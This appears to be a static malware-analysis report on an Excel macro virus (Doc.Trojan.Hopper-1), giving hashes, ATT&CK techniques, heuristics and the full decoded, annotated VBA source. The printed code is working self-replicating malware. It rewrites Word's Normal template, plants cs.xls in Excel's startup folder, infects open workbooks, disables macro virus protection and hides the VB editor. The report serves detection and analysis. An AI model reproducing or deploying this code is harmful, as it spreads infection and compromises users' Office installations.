Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95b23ab5e434eb52…

MALICIOUS

Office (OLE)

19.5 KB · Created: 2001-01-26 17:41:35 · Authoring application: Microsoft Excel · First seen: 2012-06-14
MD5: 82ebc5fb4b8f2eff49df09bc5fe0ed31 SHA-1: 5f74166677c8d06930d3aa70fba510cb114f7f73 SHA-256: 95b23ab5e434eb5207b35d37737f5644ee5149dd8589a1130ef8ec0d64ef0d90
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel file contains malicious VBA macros that attempt to establish persistence. When the workbook closes, the macro drops a copy of its own code as 'cs.xls' in the Excel startup directory and also embeds the same VBA code into the Word global template ('NormalTemplate'), which it reaches through a Word.Application COM object. This allows the macro to execute automatically whenever Excel is started and to spread between Word documents and Excel workbooks. The ClamAV detection 'Doc.Trojan.Hopper-1' further supports the malicious nature of the file.

Heuristics 4

  • ClamAV: Doc.Trojan.Hopper-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4057 bytes
SHA-256: 4fcf540b1d8a611f87574084d4a7535ebe034ded4adf32f6037a8674895e0ecc
Detection
ClamAV: Doc.Trojan.Hopper-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'MultiSys
Private RunFlag As Boolean
' Analyst notes on the module header:
' - The comment line 'MultiSys above appears to be the first line of the code
'   module (Attribute lines are export metadata) and serves as the sample's
'   "already infected" marker: every procedure below compares a target
'   module's Lines(1, 1) against the literal "'MultiSys" before overwriting it.
'   Detection content can key on this exact first-line string.
' - RunFlag is declared but never referenced anywhere in the extracted code.
' Word-side entry point. Document_Close is a Word document event, and the object
' model used here (NormalTemplate, ActiveDocument, Options.VirusProtection) is
' Word's; inside the Excel host this name is bound to no event, so the procedure
' is presumably only live once the module has been copied into Word's Normal
' template or an open Word document.
Private Sub Document_Close()
    ' Swallow every error so partial failures never surface to the user.
    On Error Resume Next
    ' Clear file attributes (0 = vbNormal) on the Normal template so a read-only
    ' flag cannot block the rewrite below. NormalTemplate with no property is
    ' presumably its default (Name) property -- TODO confirm.
    SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
    ' Suppress the "save changes to Normal?" prompt, conversion confirmations
    ' and Word's macro virus protection warning.
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    ' First code component of the Normal template and of the active document.
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    ' Document -> Normal template: replace the template's code wholesale unless
    ' line 1 already carries the infection marker.
    If NT.Lines(1, 1) <> "'MultiSys" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
    End If
    ' Word -> Excel: attach to a running Excel instance, or start one and note
    ' (Quit = 1) that it must be closed afterwards. xlApp is assigned only in
    ' the CreateObject branch; when GetObject succeeds, the xlApp calls below
    ' fail and are silently skipped by On Error Resume Next, so the Excel drop
    ' appears to occur only when Excel was not already running.
    xlsObj = GetObject(, "Excel.Application"): Quit = 0
    If xlsObj = "" Then Set xlApp = CreateObject("Excel.Application"): Quit = 1
    ' Persistence: if cs.xls is absent from Excel's startup folder (workbooks
    ' there are opened automatically when Excel starts), create it and inject
    ' the Normal template's code into its ThisWorkbook module.
    If UCase(Dir(xlApp.Application.StartupPath + "\cs.xls")) <> UCase("CS.XLS") Then
        xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\cs.xls"
        xlApp.Workbooks("cs.xls").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
        xlApp.Workbooks("cs.xls").Close SaveChanges:=True
    End If
    ' Only quit Excel if this procedure started it.
    If Quit = 1 Then xlApp.Application.Quit
    ' Normal template -> document: also (re)infect the active document.
    If AD.Lines(1, 1) <> "'MultiSys" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
End Sub
' Named after Word's built-in ViewVBCode command; Word runs a macro carrying a
' built-in command's name in place of that command, so the user's attempt to
' open the VB editor from the menu reaches Stealth instead.
Sub ViewVBCode(): Stealth: End Sub
' Intercepts Word's Tools > Macro command (same built-in-name mechanism), so
' the macro list cannot be reached through the menu.
Sub ToolsMacro(): Stealth: End Sub
' Intercepts Word's File > Templates command, hiding the Templates and Add-ins
' dialog through which the modified Normal template could be inspected.
Sub FileTemplates(): Stealth: End Sub
' Anti-analysis helper shared by the three command-named Subs above: hides the
' Visual Basic Editor (ShowVisualBasicEditor = 0) and disables the Cancel key
' (EnableCancelKey = 0, i.e. Ctrl+Break) so a running macro cannot be interrupted.
Private Sub Stealth(): On Error Resume Next
    ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
' Excel-side entry point: fires when this workbook is about to close. Mirrors
' Document_Close in the other direction -- Excel -> Word's Normal template,
' then Excel's startup folder and every open workbook. Cancel is never set.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    ' Swallow every error so partial failures never surface to the user.
    On Error Resume Next
    ' Attach to a running Word instance, or start one and note (Quit = 1) that
    ' it must be closed afterwards.
    Set WordObj = GetObject(, "Word.Application"): Quit = 0
    If WordObj = "" Then Set WordObj = CreateObject("Word.Application"): Quit = 1
    ' First code component of Word's Normal template; clear the template file's
    ' attributes (0 = vbNormal) so it can be rewritten.
    Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
    SetAttr WordObj.NormalTemplate.Path + "\" + WordObj.NormalTemplate, 0
    ' Excel -> Word: unless line 1 already carries the marker, silence the
    ' "save Normal?" prompt and replace the template's code with this module.
    If NT.Lines(1, 1) <> "'MultiSys" Then
        WordObj.Options.SaveNormalPrompt = False
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
    End If
    ' Only quit Word if this procedure started it.
    If Quit = 1 Then WordObj.Application.Quit
    ' Persistence: write cs.xls into Excel's startup folder (workbooks there are
    ' opened automatically when Excel starts). Unlike Document_Close there is no
    ' Dir() check, so the file is re-saved on every close; AddToMru:=False keeps
    ' it out of the recent-files list.
    Workbooks.Add.SaveAs Filename:=Application.StartupPath & "\cs.xls", FileFormat:=xlNormal, AddToMru:=False
    ' Excel -> Excel: inject this module into every open workbook (including the
    ' freshly added cs.xls) whose ThisWorkbook module lacks the marker on line 1.
    For i = 1 To Workbooks.Count
        If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'MultiSys" Then
            Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
    Next
    ' Persist the injected code in the startup-folder copy.
    Workbooks("cs.xls").Close SaveChanges:=True
End Sub

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True